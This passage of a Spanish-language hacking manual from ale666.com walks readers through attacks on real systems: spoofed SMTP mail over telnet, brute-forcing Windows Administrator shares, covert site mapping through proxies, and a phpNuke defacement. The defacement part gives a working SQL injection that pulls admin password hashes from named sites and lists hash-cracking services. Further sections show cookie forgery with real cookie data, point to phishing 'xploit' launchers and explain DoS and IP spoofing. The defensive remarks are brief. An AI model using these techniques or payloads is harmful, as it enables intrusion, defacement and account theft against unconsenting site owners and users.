CONCLUSIONES

Disponemos de herramientas de escaneo, y de otras para descubrir los passwords.
Seria muy sencilla entonces, nuestra intrucion en telnet, ftp, rdp, vnc, http,http auth,
Smtp, etc.
Es o seria una cuestion de tiempo, Buenos diccionarios de palabras, y mas tiempo.

























www.ale666.com


El Libro Mestro__________________________________________ - 38 -
SMTP TELNET
Mail anonimo y emulacion smtp



Aqui si que no hay mayors misterios, es tan solo seguir el protocolo
Desde nuestra consola, escribimos telnet y le damos a enter




Conectaremos a un servidor smtp de su eleccion al puerto smtp que es el 25
Asi que escribiriamos algo asi como telnet smtphost 25

Ejemplo: telnet mail.bellsouth.net 25

Recibimos esto como respuesta a nuestro pedido de coneccion



Aqui entonces tenemos ya algo de informacion
Sabemos el host ibm61aec.bellsouth.net, y tambien sabemos el servidor que utiliza ESMTP server

Ahora nos identificamos, le decimos helo al server



El server nos responde
Asi que ahora le indicaremos desde donde enviaremos nuestro e-mail



El que invente funciono, lo toma como enviador valido,


www.ale666.com


El Libro Mestro__________________________________________ - 39 -

Aclaracion: no todos los servidores aceptan el envio desde un mail externo a su dominio.

Asi que ahora le indiaremos a quien se lo mandamus
RCPT TO:



Como se ve en el ejemplo si trato de enviar a un e-mail, dentro de su dominio, puedo pero deberia
conocer a que cuenta.

Probare enviar a otro dominio.



Bueno, me dice que no, esto indica que no puedo enviar desde bellsouth a otro dominio, pero si quisiera
enviarle un e-mail, a alguien que tuviera una cuenta en bellsouth, si podria, con cualquier nombre de
remitente.
Asi que probare con otro host.

Aqui les dejo la transcripcion del e-mail enviado por telnet, cubri los nombres para no generar problemas.


Asi que los otros commandos a utilizar, son DATA para el inicio del mensaje
. (punto) para enviar el mensaje
Quit, para salir y terminar la session.
Hay algunos otros, pero para eso esta nuestro amigo google.




www.ale666.com


El Libro Mestro__________________________________________ - 40 -

Recursos Compartidos


No quiero adentrar mucho en esto ya que es lo mas comun, y lo que mas info se encuentra.


Pero para nuestra exploracion, utilizaremos el NETBios Auditing Tool
Lo descargamos de aqui.
No tiene instalacion, tan solo lo descomprimes en una carpeta, y luego te diriges a el por consola, (cmd)
para ejecutar el NAT.exe
En mi caso, la consola que utilize tiene todo ya incorporado, haciendome mas facil la tarea, ya que no
necesito moverme del directorio, para ejecutar ninguna aplicacion.



Con teclear nat.exe, tendremos las opciones
Asi que ahora solo necesitamos

Asi que la forma correcta de escanear y tartar de pasarse el password, seria.

Nat.exe o aquidondeloguarda u leerlosnombres p leerlospasswords ip

Se debe dar la ruta completa de los .txt tanto para que guarde los resultados, como donde esta nuestra lista
de nombres, como la de passwords, asi que nuevamente debemos tener, buenas y completas listas.

Al ejecutar nuestra accion veremos esto



Y de obtener el resultado deseado, vamos a nuestro archive resultados.txt y veremos, el pass para poder
acceder de manera full

Antes de obtener el pass, esto es lo que se podia ver

www.ale666.com


El Libro Mestro__________________________________________ - 41 -



Ahora que tengo un user y un password
Lo que logro es esto




O sea estoy situado en C: con todos los derechos.
www.ale666.com


El Libro Mestro__________________________________________ - 42 -

Dado que todas las PC con Windows, tienen un usuario Administrador,
Mi lista de nombres lo unico que tenia es dos nombres
Administrator
Administrador
Asi que lo complicado esta, en la lista de passwords, hay que disponer del tiempo y las ganas para hacerlo.
No es algo que suceda, la primera vez, ni en 5 minutos, claro que hay escepciones, muchas veces he
probado user : administrator
Pass : password

Y funciono de maravilla, hay muchos administradores, que para no complicarse, o por miedo al error, o
porque tal vez en algun momento deban compartirlo con alguien, utilizan la palabra password, como
estandar para los administradores.

Hay algunas otras palabras, que son clasicos de passwords, esa info, asi como listas, las podran conseguir
en google





























www.ale666.com


El Libro Mestro__________________________________________ - 43 -





Fingerprinting

Web server fingerprinting es tan solo descubrir informacion util sobre un servidor web, para
luego chequear su vulnerabilidad.

Todos conocemos escaners de vulnerabilidad.
Yo en este caso utilizare el httprint
Lo descargan de AQUI httprint
Este programa en su version para windows, se puede utilizar tanto con interfaz grafica como por linea de
commandos





Para obtener la ayuda alcanza con teclear su nombre y dar enter
www.ale666.com


El Libro Mestro__________________________________________ - 44 -


Ahora lo que voy a hacer es explorar un servidor, y guardar el resultado com html,

La sintaxis correcta esta mostrada en USAGE:

httprint h hostip:puerto -s elfilesignature o opcion

El resultado final es

Aqui obtenemos la info necesaria.

Hay ciertos escaners de vulnerabilidades, que nos permiten hacer esto, y aparte tartar de explotar la
vulnerabilidad.







www.ale666.com


El Libro Mestro__________________________________________ - 45 -

Estructura de un servidor web


Seria bueno, para chequeo de vulnerabilidades, asi como para saber mas de un servidor, poder mapear el
contenido completo ( o lo que se pueda)

De esta manera conoceremos mas datos, y su estructura fisica.
Para esto utilizaremos Intellitamper.

Lo descargas de aqui Intellitamper.

Y lo que haremos sera ir a File/Options



De las opciones, cambiaremos, para dejarlas a nuestra conveniencia
En el ejemplo , utilizare solo 2 conexiones simultaneas, dado que no quiero ser descubierto
El default son 10, y permite hasta 30, prefiero 2

El resto como estan

www.ale666.com


El Libro Mestro__________________________________________ - 46 -


Las opciones en este paso son bastante claras y especificas
Marcas las que necesites



www.ale666.com


El Libro Mestro__________________________________________ - 47 -



Si vamos a utilizar un servidor Proxy aqui es donde debemos configurarlo
Encontraras varios si buscas en google - free proxy servers
Ten en cuenta que cambian a diario a veces o mas











www.ale666.com


El Libro Mestro__________________________________________ - 48 -

En caso que necesitemos cookies, pues se marca la casilla y ya
No es este el caso.

Le damos OK

Y pasamos al programa nuevamente.

Le damos a Start Scan y veamos lo que sucede


www.ale666.com


El Libro Mestro__________________________________________ - 49 -

Ya comenzamos a tener informacion
Vemos la IP, el dominio, El software y version que corre el servidor
La hora y comenzamos a ver la estructura del servidor



Ahora bien.. vemos la estructura, y en ella algunos folders tienen candado o sea restringido
Pero aun asi, si bien no tendremos acceso, podremos ver el contenido (en la mayoria de los casos) de estas
carpetas.
www.ale666.com


El Libro Mestro__________________________________________ - 50 -


Y tambien podremos acceder a parte de cierto contenido

www.ale666.com


El Libro Mestro__________________________________________ - 51 -


Hasta aqui vimos, como descubrir la estructura fisica de una web
Que tal si ahora nos querremos descargar su contenido


Para esta tarea, utilizaremos otro programaTeleport

Lo descargamos desde aqui.

Abrimos el programa y al acer click sobre el aviso, nos saldra un wizardque debemos seguir



www.ale666.com


El Libro Mestro__________________________________________ - 52 -




www.ale666.com


El Libro Mestro__________________________________________ - 53 -


Elegimos el lugar donde lo guardaremos.



Volvemos al programa, y le damos al boton start

www.ale666.com


El Libro Mestro__________________________________________ - 54 -


Y comenzara a descargar por completo el sitio






Eso es todo, cuando termine, si era un sitio publico, tendremos el total de su contenido y estructura en
nuestro hard drive

Esto tiene multiples utilidades
En ciertos casos, no todo el contenido de una web, parte desde el mismo html del sitio principal, pero para
eso, ya sabemos como saber la estructura fisica, para podernos guiar

















www.ale666.com


El Libro Mestro__________________________________________ - 55 -
Deface a phpNuke
By Marcus

Introduccin
Que tal pues aqu estamos mi nombre es MaRcUs (supongo q habr otros marcus...) pero venga a quien le
importa de verdad? Vamos a lo serio el deface:

Qu es un deface?
Antes de ir a la prctica veamos que es un deface primero
Los podra mandar a buscar a google pero como se que son medio flojos lo voy aponer aqu:
Bsicamente un deface es ganar acceso ilegitimo por cualquier medio a una web y modificar su contenido,
lo ms comn es encontrar mensajes como:
Contraten hackers para su seguridad hdp
hahaha el administrador es un idiota
Cosas por el estilo, tambin se suele encontrar el clsico Defaced by y saludos a los amigos del seudo
hacker.
Yo en lo personal prefiero no ser destructivo si acaso dejo un mensaje Defaced by MaRcUs y un mail
para que me contacten y sepan como corregir la vulnerabilidad.
Pero bueno lo que quieran hacer queda dentro de ustedes.

Qu herramientas necesito?
Aunque hay varias vulnerabilidades a explotar nosotros en este manual nos centraremos al deface de
pginas utilizando phpNuke y para esto necesitamos:
Nuestro buen amigo GOOGLE
Una VICTIMA (no se preocupen esta la encontraremos mas tarde)
Y el FIREFOX aunque pueden utilizar el Internet Explorer pero a mi me gusta mas el otro.
En caso de querer esconder su IP utilizar Torpak o Vidalia y Tor
Bueno si ya tienen todo esto listo excepto la victima procedamos.

Seleccionando una victima:

Bueno pues primero vamos con nuestro gran amigo GOOGLE y ponemos esto:
modules.php?name=Statistics Version PHP-Nuke (sin las comillas )
Pero se preguntaran q es esto pues simplemente eso nos servir para encontrar sitios que estn corriendo
en phpNuke, modules.php?name=Statistics eso nos llevara en cualquier pagina de phpNuke a sus
estadsticas donde nos mostrara algo as:


www.ale666.com


El Libro Mestro__________________________________________ - 56 -



Como pueden ver es una pagina de estadsticas sobre sistemas operativos y navegadores, esto simplemente
nos sirve para saber que la pagina esta en phpNuke pero no todas son vulnerables, para verificar si son
vulnerables haremos lo siguiente:
Sustituimos modules.php?name=Statistics por:
modules.php?name=Search&type=comments&%20%20%20query=&%20%20%20query=loquesea&inst
ory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors
En nuestro caso la pgina era
http://www.clubsaabespana.com/modules.php?name=Statistics y nos quedo
http://www.clubsaabespana.com/modules.php?name=Search&type=comments&%20%20%20query=&%2
0%20%20query=loquesea&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors
Si entran en esa pagina podrn ver que nuestra peticin fue rechazada :S al parecer esa pagina no es
vulnerable. Pero no importa vamos a buscar otra, entonces vamos a google y buscamos
modules.php?name=Statistics Version PHP-Nuke (sin las comillas)

Genial nos dio varios resultados ahora escogemos uno y probamos cambiando la direccin como lo
hicimos anteriormente hasta que alguno nos de algo como esto:
www.ale666.com


El Libro Mestro__________________________________________ - 57 -

Ven que la busquedo dio un resultado:
254ec841347d5fd0266cf90bd4f56b76
Enviado por paquitos el
Adjuntar al Artculo:
(564 responde)

Bueno pues expliquemos lo que es esto

254ec841347d5fd0266cf90bd4f56b76 Ese es el pass encriptado en md5
Enviado por paquitos el paquitos es el nombre del admin.
Adjuntar al Artculo:
(564 responde)

Bueno pues ya estamos a la mitad del camino, ya tenemos nuestra victima seleccionada y estamos casi
seguros q es vulnerable solo falta una cosa antes de darnos a la tarea de crackear el md5, en la direccin
tienen que verificar tenga acceso a admin.php lo hacemos simplemente poniendo en este caso por ejemplo:
Estamos en:
http://members.lycos.co.uk/paquitos/modules.php?name=Search&type=comments&%20%20%20query=&
%20%20%20query=loquesea&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_auth
ors
Pues nada mas ponemos:
http://members.lycos.co.uk/paquitos/admin.php
Si conseguimos la ventana de login perfecto!! La web es vulnerable ahora si lo q sigue..

CRACKEANDO EL MD5
Primero obviamente necesitamos saber que es un md5
As q vamos a nuestro amigo www.google.com y buscamos por md5:
http://es.wikipedia.org/wiki/MD5
www.ale666.com


El Libro Mestro__________________________________________ - 58 -
el primer resultado esta en espaol no lo voy a copiar y pegar, solo necesitan ir y leerlo cuando acaben
regresan

Bueno como se que no se lo leyeron les digo que es md5 en resumen:
Md5 es un algoritmo de encriptacin que convierte una palabra o secuencia de palabras en una cadena
compuesta por 32 caracteres.

Ahora que ya saben lo que es vamos a crackear el hash (hash es la cadena q se obtiene despus de la
encriptacin en este caso: 254ec841347d5fd0266cf90bd4f56b76)

Tenemos dos opciones una usar algn programa para crackearlo o irnos a las bases de datos que circulan
por Internet lo mas recomendable creo es ir primero a las bases de datos y luego si no encontramos nada
intentar crackearlo nosotros mismos, ten en cuenta que esto toma tiempo Tambin puedes enviar el hash
a una de las paginas que mencionare despus y despus d uno o dos das tendrs el hash crackeado

Bueno pues yo me voy a centrar nada mas en las paginas webs que se dedican a recuperar hashs perdidos
si me metiera a lo del programa seria hacer otro manual sobre este talvez luego

Bueno pues ya con nuestro hash nos vamos a ir a cualquiera d estas pags:
http://gdataonline.com
http://passcracking.com
http://passcracking.ru/index.php
http://www.plain-text.info
http://milw0rm.com
http://md5.rednoize.com
http://md5.altervista.org/
http://shm.hard-core.pl/md5
http://md5.shalla.de/cgi-bin/index.cgi
http://md5.benramsey.com/

Escogemos una pagina y vamos a probar el hash es cuestin de probar, tienen diferentes bases de datos y
si no lo encuentras en una es posible que este en la otra, en este caso yo voy a probar en www.plain-
text.info

www.ale666.com


El Libro Mestro__________________________________________ - 59 -
Perfecto al parecer encontr algo:
ID Submitter Algorithm Hash Value Hex Value Status Submited
28045 Anonymous md5 254ec841347d5fd0266cf90bd4f56b76 chipiron 6368697069726f6e Cracked
13/11/2006
16:11
Las partes:
ID: Es el numero de envo (nada importante mas que nada lo usan para mantener control)
Submitter: Es quien lo envo para que fuese desencriptado normalmente Anonymous, la forma para el
registro depende de cada pg.
Algorithm: Es el algoritmo con el que estaba encriptado, nosotros usamos md5 ahora pero ah mas, aun que
en phpNuke solo usan md5.
Hash: Este fue el hash enviado a desencriptar.
Value: Este es el que nos interesa es el hash desencriptado en este caso es chipiron este es nuestro
password.
Hex Value: Este es el valor hexadecimal.
Status: Es en el estado que se encuentra puede ser:
Cracking: En proceso de crackeo por lo tanto no hay contrasea aun.
Queque: En lista de espera para iniciar crackeo, sin contrasea aun.
Cracked: Ya esta crackeado, la contrasea ya esta disponible
Not Found: No se encontr la contrasea, lastima
Submited: La fecha en que fue enviado.

Bueno ya conocemos las partes de esa tabla ahora vamos a lo nos interesa ingresar a la pagina

Ya tenemos user y pass y ahora que?
Pues muy simple nos vamos a la pagina de administracin que ya habamos checado antes (admin.php)
recuerden que es necesario este activa sino no podrn entrar, sino esta activa puede que sea manejada
mediante ftp la pagina directamente podran tratar usar el password del admin. Para entrar con ese user y
ese pass al ftp puede funcionar

Entonces nos vamos a:
http://members.lycos.co.uk/paquitos/admin.php
en este caso por ejemplo y nos encontramos con esto:

www.ale666.com


El Libro Mestro__________________________________________ - 60 -

Damos a login y

Listo ya estamos dentro ahora ya aqu dentro se pone en cuestin su imaginacin y su tica XD para
hacer nada malo y avisar al webmaster sobre el bug y como arreglarlo o si destruir todo y dejar su firma :D.

Lo que yo suelo hacer para evitar que alguien haga esta inyeccin es ir y desactivar el modulo de search o
bsqueda es solo un consejo aunque hay otras soluciones esta es la mas rpida pero no perfecta (si se
puede sobrepasar esto pero eso lo tendrn que encontrar uds)


Para finalizar:
Cdigo a buscar en Google: modules.php?name=Statistics Version PHP-Nuke
Inyeccin sql:
modules.php?name=Search&type=comments&%20%20%20query=&%20%20%20query=loquesea&instor
y=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors

MaRcUs







www.ale666.com


El Libro Mestro__________________________________________ - 61 -

Falsificacacion de Cookies
By l vagu.


Bueno, en este breve manual les voy a mostrar como falsificar una cookie y en base a esto obtener acceso a
pginas de internet, en las cuales previamente se aceptar de parte del usuario vctima, la opcin "login
automatico" o recordatorio de passwords.

Que es una cookie?
Cookie, trmino de origen ingls cuyo significado es galleta. Se utiliza para hacer referencia, a archivos de
texto almacenados por los exploradores de internet, como IE(Internet Explorer), Mozilla Firefox, Netscape,
etc. En pocas palabras, es un archivo de texto(.txt), que almacena datos como nombre de usuario, password,
skins, links a los que se accedi, etc. Se inventaron, por que el protocolo http(asociado al html), no poda
contener por si mismo esos datos.

Donde estn?
Se ubican en Documents and Settings>"el nombre de usuario">Cookies, es decir, en caso de que fueramos
el usuario "Invitado", se almacenaran en C:\Documents and Settings\Invitado\Cookies\. En esa carpeta,
veremos muchos archivos txt con nombres de sitios de internet. He aqu los cookies!!!. En caso del firefox,
se guardan en C:\Documents and Settings\[usuario]\Datos de programa\Mozilla\Firefox\Profiles.

Como los falsifico?
Bueno sto es muy fcil. Para falsificar un cookie, solo tenemos que hacer que se nos cree el cookie de
manera normal, accediendo a una pgina que tenga recordar password o login automtico. Nos cremoas un
usuario en dicha pgina, y le marcamos la opcin recordar contrasea y login automtico, o algunas de las
dos. Luego, salimos de la pgina. Buscamos el cookie que se creo en nuestra pc.
Ahora viene lo segundo. Todo esto, se hace suponiendo que tienemos otro cookie, el cual pensamos
falsificar. Bueno en caso de que lo tengamos, sin importar su origen, lo abrimos, copiamos todo el
contenido del archivo, y luego lo pegamos dentro de la cookie que se genero dentro de nuestra carpeta
cookie. Y ya est, la prxima vez que entremos en esa pgina, entraremos logueados como el usuario de la
cookie que se falsific.

Necesitas probarlo?
He creado en este foro, un usuario con el nombre "probando" para que quienes quieran probar, puedan
hacerlo. Lo que tenemos que hacer, es hacer un logout de nuestra cuenta actual. Entramos de nuevo, previo
marcar la opcin de conectar automaticamente, que se llama "Always stay logged in". O simplemente,
www.ale666.com


El Libro Mestro__________________________________________ - 62 -
cuando el IE nos pregunte si deseamos recordar la contrasea, le damos a si.
Ahora viene lo segundo, vamos a la carpeta de cookies, y buscamos un archivo llamado "usurio@smf[1]".
Ten en cuenta, que la palabra usuario, cambiar por el nombre de tu cuenta de usuario. Una vez con el
archivo, lo abrimos y pegamos dentro los datos pertenecientes al cookie de "probando".

Datos del cookie probando:
SMFCookie11
a%3A4%3A%7Bi%3A0%3Bs%3A3%3A%22255%22%3Bi%3A1%3Bs%3A40%3A%22bc7a4facdaf9467
c8bf06a066a5aa8fef6f7b147%22%3Bi%3A2%3Bi%3A1353636156%3Bi%3A3%3Bi%3A1%3B%7D
ale666.byethost7.com/smf/
1536
2610185728
30263582
3145150416
29823029
*

Ahora accedemos al foro y listo, ya estamos autentificados como el usuario "probando" =).

Notas finales
Esto sirve tanto para usarse dentro de los campos del hacking fsico como as tambin para el hacking
remoto. No importa cual es la manera por la cual obtenemos el cookie. Siempre que sea una cookie y
sepamos a que pgina web pertenece, podremos aprovecharnos de esto.
Tambin es importante notar, que sirve para pginas de compras por internet, servicio de mensajera, etc.
Es decir, prcticamente cualquier pgina es vulnerable a esto, siempre y cuando permita el guardado de
cookies.

Recomendacin
No es recomendable usar el recordar password o login automatico en los cibers, como tampoco en redes
compartidas. De hecho, lo mejor sera que no usaran esas opciones, de esta manera se evita el riesgo de
una falsa autentificacin por parte de otro usuario.

Espero que les sea til!!!.





Exploits
By l vagu.

Bueno, antes que nada, vamos a aclarar un par de trminos bsicos para no crear confusiones y errores de
conceptos.

Xploit: Programa que simula ser una tarjeta de mensaje, una postal, etc, para aprovecharse de usuarios
inexpertos de los servicios e-mail, y as robar su contrasea. Bsicamente, se trata de un tipo de ingeniera
social automatizada. Ingeniera social, por que realmente no se trata de hacking, ya que es el usuario quien,
www.ale666.com


El Libro Mestro__________________________________________ - 63 -
al caer en la trampa, otorga su contrasea, y automatizado, por que sigue una secuencia lgica de
parmetros y una estructura prediseada, es decir un xploit nunca va a cambiar su diseo y caractersticas, a
menos claro que lo modifiquemos nosotros, pero en ese caso ya no sera el mismo.
La estructura bsica y mas usada de los xploits, es la de un mensaje, donde se informa sobre alguna ventaja
o regalo y se pide que se acceda a una determinada direccin, externa, a los servidores de mensajera. Una
vez en la direccin EXTERNA(ntese que los servidores de e-mail quedan exentos de cualquier
responsabilidad), el xploit nos informa de un error de login o algo similar y nos invita a que coloquemos
nuestro usuario y contrasea. Luego se da en aceptar y ah est, la victima a mandado su usuario y
contrasea a otra persona.
Los xploits, suelen venir con una explicacin de su funcionamiento y donde hay que agregar ciertos datos,
para que nos sea funcionales.
Aqu podrn encontrar un par:

http://www.hackear-msn.com/lanzadores_para_correos.html
Hay que estar registrado y logueado para poder usarlo. Realmente no se si funciona, pero la verdad es que
les recomiendo que no se explayen mucho en este tema en particular. Sin embargo, buscando en google,
pueden encontrar muchas paginas web con la opcin de lanzamiento.

Nota: Sin embargo, aprovecharse de la inexperiencia de los usuarios de servicios de mensajera, es
ILEGAL, adems de considerado lammer por la comunidad hacker, por el hecho de ser una violacin a los
derechos de privacidad. Utilizarlo como parte de una estrategia para obtener acceso a un servidor, es
aceptable en ciertos casos, ahora andar leyendo el correo de cualquier persona, y hacer un pavoneo de
nuestras habilidades hacker por ello, es de lo mas lammer.

Exploit: El exploit, es un programa cuya funcionalidad, consiste en intentar de explotar (de ah el termino
de exploit) vulnerabilidades o bugs de los sistemas, programas o servicios, tanto remotos como fsicos. En
otras palabras, y para intentar explicar un poco mejor el concepto, podemos decir que el exploit, es una
secuencia de cdigo, normalmente assembler o shell script, cuya finalidad es automatizar un proceso que
nos permitir obtener una ventaja sobre el sistema victima, tal como privilegios de root, cadas del sistema,
captura de informacin privada, etc. A la vez, segn el tipo de ataques que tengamos en mente hacer,
vienen diferentes tipos de exploits. As podemos diferenciar a los ataques de esta manera:

Dos(Denial of Service): Este concepto es sinnimo de flooding(en ingles basura), y consiste en generar una
sobre saturamiento, debido a una cantidad de datos excesiva mandada, y posterior desbordamiento de
buffer a un ordenador o a una red de estos, para evitar el acceso a determinados servicios por parte de los
usuarios originales. Usado generalmente por los crackers y en combinacin con el spoofing(Ver mas
adelante), esta es una tcnica que por lo general deja inhabilitado un servicio dentro de una red, o la red en
su totalidad. Profundizando el concepto, vamos a decir, que la inhabilitacin de un puerto de un equipo, o
todos los puertos de ese equipo, al ser atacados mediante flood, recibirn una excesiva cantidad de datos
provenientes de parte del atacante, que al no poder ser interpretadas por la maquina victima, sobreviene en
dicha inhabilitacin.
Un ejemplo claro pero viejo de un ataque Dos, sera el muy conocido ping de la muerte que consiste en
hacer un ping con una cantidad de bytes por paquetes excesivas, lo cual en los servidores o equipos que
corran bajo win98, quedan varados y se caigan, al no poder interpretar y resolver semejante cantidad de
datos. Esta vulnerabilidad, qued obsoleta y parchada en los sistemas posteriores, haciendo que al ser
demasiado grandes los paquetes, se cancele el recibimiento por parte de la victima. Otra solucin tambin
fue la inhabilitacin de los pedidos ping a ese servidor en particular. Entonces cuando nosotros tratamos de
hacer ping a la victima, nos informa que no existe. Otro ejemplo de este tipo, es el que se usaba mucho
antes que el ping de la muerte, y en sistemas Unix, que consiste en hacer finger
@@@@@@@@@@@@@@@@@@[servidor victima] de manera que el servidor no pudiera resolver
el pedido finger y se quedara tildado. Si bien esto puede ser utilizado en algunos sistemas Unix, la mayora
tienen deshabilitadas las peticiones finger, o restringidas al menos.
Estos ataques, se realizan y automatizan mediante otros programas, como por ejemplo el fiyaflooder, etc.
Tambin se utiliza mucho el flooding, dentro del mbito de las salas de chat y sitios de chating en general,
como son las salas de chat de los gestores de descargas P2P (Emule, Ares, etc) y de otros programas,
utilizndolos por muchos para eliminar a aquellos que no son deseados. Si bien es muy tonto ir volteando a
www.ale666.com


El Libro Mestro__________________________________________ - 64 -
cualquiera para presumir, no est mal saber al respecto de como evitarlo y tener alguno por si nos atacan
sin razn alguna. Estos ataques, se realizan mediante puertos TCP o UDP, generalmente. Por esto, para
floodearnos, deben realizar una conexin con nosotros, y aqu surge la solucin mas sencilla, si no pueden
conectarse a los puertos, no podrn atacarnos. Por suerte, en la actualidad encontrar un port blocker
(bloqueador de puertos), no es una tarea que requiera de tiempo o inteligencia. Solo hay que ir a Google y
buscar. Lo mejor del port blocker, a diferencia de los firewall, es que bloquea cualquier conexin
sospechosa a cualquier puerto, ya este permitido o no por el firewall. Esto es esencial, por que el firewall,
no bloqueara ninguna informacin que entre por los puertos permitidos. Esto quiere decir, que si estamos
usando el Ares en una sala de chat, solo hace falta que averigen que puertos tenemos abiertos y listo, ya
nos podrn floodear. Esto no pasa con un bloqueador de puertos, que como dijimos, bloquea conexiones
sospechosas.


DDos(Destribud Denial of Service): Funciona de la misma manera que el anterior, pero con la diferencia de
que ste ataque se centraliza en todos los puertos abiertos de un equipo remoto.

IPSpoofing / IPHijacking: Este tipo de ataque, al igual que el IPHijacking, se basa en el falseo de una
direccin IP (internet protocol). Mas en concreto, se trata de falsear la direccin IP de un servidor, que tiene
una relacin de confianza con otro servidor victima, es decir el servidor al que queremos tener acceso. El
falseo, se realiza mediante la modificacin de paquetes TCP (transport control protocol) y un ataque Dos al
puerto de respuesta (explicado anteriormente).

Para adentrarnos en el IPSpoofing / IPHijacking, vamos a tratar de entender dos protocolos, IP y TCP,
ambos muchas veces confundidos con TCP / IP, aunque eso es solo una usanza para expresar la asociacin
de ambos.

TCP, se caracteriza por la necesidad de que tiene que haber dos lados, es decir tiene que haber dos equipos,
uno a la escucha de conexiones, el server, y otro que hace pedido de conexin, el cliente. Para que un
servicio basado en el protocolo TCP funcione, si o si, tiene que haber un equipo a la escucha de conexiones
del otro lado, de forma tal que se pueda iniciar la conexin entre ambos equipos, y el posterior intercambio
de datos. Si nosotros quisiramos iniciar una conexin con un equipo determinado, y ese equipo, no
existiera, o no permitiese la conexin, no podramos llevar a cabo una intercambio de paquetes TCP. Esta
caracterstica esencial de dicho protocolo, viene dada por el hecho de que TCP sirve para garantizar el xito
la comunicacin y la buena recepcin de los paquetes. As, si hubiese un error en medio de la conexin, el
equipo que recibi un paquete defectuoso o no esperado, enviar un pedido de repeticin al equipo con el
que mantiene la conexin.
Ahora, llevamos tiempo hablando de paquetes, y no hemos explicado bien que es. Toda la informacin que
viaja a travs de este protocolo, lo hace por medio de un sin fin de minsculos (en sentido al tamao en
bytes) paquetes, que contienen la informacin que se desea transmitir.
Sin explayarnos mucho mas en el tema de los paquetes, pasamos al esquema de conexin de TCP. La
estructura bsica de conexin del protocolo TCP, es de la siguiente manera:

Servidor 1 > Enva peticin de conexin. > Servidor 2
Servidor 1 < Avisa que se manda una autentificacin de conexin.< Servidor 2
Servidor 1 > Confirma la llegada de autentificacin. Conectado. > Servidor 2

Nota: Los ><no se usan para indicar que es mayor, o menor que la otra expresin, si no para indicar la
direccin de los paquetes TCP.

Todo esto es un ejemplo de conexin de dos equipos diferentes, por medio de paquetes TCP. Esta conexin
se realiza sincronizando ambos servidores. Para poder entender esto de mejor manera, es necesario saber
que los paquetes TCP, vienen con una cabecera que contiene datos de ambos servidores y en hexadecimal.
Los datos principales que tenemos que tener en cuenta para tratar los paquetes TCP, son:

Nmeros de los paquetes: As tambin tenemos dos nmeros vitales, para que la conexin entre el servidor
1 y el servidor 2 se lleve a cabo. Estos son el SEQ_NUMBER (o nmero de secuencia) y el
www.ale666.com


El Libro Mestro__________________________________________ - 65 -
ACK_NUMBER (o numero de reconocimiento). Tanto el servidor 1 como el 2, generan su propio SEQ y
ACK el empezar su conexin. El SEQ, es igual al numero de bytes que se envan en el primer paquete, y
tanto el s1 como el s2 los generan aleatoriamente. A diferencia del SEQ, el ACK, se genera segn el SEQ
del otro servidor, sumando a ese SEQ 1. Entonces, el ACK del servidor 1 es el SEQ que se espera que
envi el servidor 2 en el prximo paquete. De esta manera se dan las siguientes igualdades:

S1_ACK_NUMBER =S2_SEQ_NUMBER* =S2_SEQ_NUMBER+1
S2_ACK_NUMBER =S1_SEQ_NUMBER* =S1_SEQ_NUMBER+1

*: Esperado por el servidor en el siguiente paquete.

Los bits de control: Los bits de control, son el motivo del paquete, es decir, pedir una sincronizacin, cerrar
la conexin, etc. Los bits, tambin identificados como flags(banderas en espaol), pueden clasificarse de la
siguiente manera: SYN (sincronizacin de nmeros de secuencia), RST (resetea la conexin), PSH (pone
el paquete en modo push), URG (prioridad de paquete: modo urgente).

Bueno ahora nos adentramos en lo que sera un IPSpoofing. Este ataque, consiste en que por medio de la
manipulacin / falsificacin de los paquetes TCP, o de sus cabeceras, logremos hacernos pasar por un
servidor para acceder a otro con el que tiene relacin de confianza. As, la idea es hacernos pasar por el s1,
para conseguir accesos en el s2, donde el primero tiene una relacin de confianza. Tambin para llevar a
cabo bien este ataque, hay que evitar que los paquetes que el s2 enviara al s1 lleguen y sean respondidos.
Imagnense, si nosotros le mandamos un paquete falso al s2, este mandar una confirmacin al servidor 1.
Este ltimo que no envi el primer paquete mandar otro con el flag RST, y fin de la conexin. Para evitar
esto, lo que tenemos que hacer es un flooding al puertos de destino del s1, evitando que el servidor pueda
responder y por tanto cerrar la conexin.
Una herramienta que nos servirn a la hora de trabajar con esta tcnica, son los sniffers. Los sniffers, son
analizadores de protocolos de red. Bsicamente, observan y examinan la informacin que emite y llega a
nuestra placa de red. Buenos sniffers para Windows, son: Ethereal y Wiresshark. Si embargo hay muchos
mas y algunos con diferentes opciones y funciones. No tratar mas acerca de los sniffers. Hay demasiada
informacin en la red y adems no es el tema central de este manual.
Bueno, le tcnica en si, ya est explicada, no hay forma de ensearla paso por paso. Ser ya cuestin de que
a cada uno, segn sus intereses, profundice o no. Tengan en cuenta que esto, al igual que el ARP Poisoning
por ejemplo, son tcnicas que solo se utilizan cuando uno ya est dentro de una red. Es as, que para
falsificar y autentificarnos en el s2 primero tendremos que tener acceso al s1.

ARP Poisoning:


Compilar un Exploit?
Esta tarea es muy importante, y hay que realizarla con cuidado y minuciosidad. Si bien no tiene una mayor
complicacin, requerir de conocimientos avanzados en programacin, no por el hecho en si de compilar el
exploit, si no de examinarlo. Tomar un cdigo bajado de Internet, y compilarlo con GCC u otro
compilador, es una accin que se realiza en cuestin de minutos y que cualquiera podra hacerla sin
mayores problemas, pero el problema radica en que no es tan fcil como eso. Muchas pginas de seguridad,
se harn nuestras aliadas a la hora de explotar vulnerabilidades, pero otras nuestras enemigas. Por la red,
circulan innumerable cantidad de cdigos maliciosos, que ejecutan algo as como un exploit reverso, es
decir, programas que tratan de aprovechar una vulnerabilidad en nuestro sistema. Estos cdigos, suelen ser
ofrecidos por personas que se presentan como descubridores de una nueva vulnerabilidad, aprovechndose
de la inexperiencia en campos de programacin por parte de los receptores del exploit, para as obtener
ventajas o acceso a su equipo. La solucin es sencilla, conseguir un manual de C y empezar a leer. Luego
profundizar en assembler y shell script. Al tiempo, no solo podremos evitar caer en la trampa de crackers, si
no, hacer nuestros propios exploits.

www.ale666.com


El Libro Mestro__________________________________________ - 66 -
Compilar un Exploit
Una vez que has ledo Compilar un Exploit?, tienes un sistema vctima, un exploit para aprovecharte de
una vulnerabilidad en dicha vctima, y ests seguro de que ese exploit no es un fake exploit (un exploit
falso de los mencionados anteriormente), lo que tienes que hacer es muy sencillo y no te traer problemas.
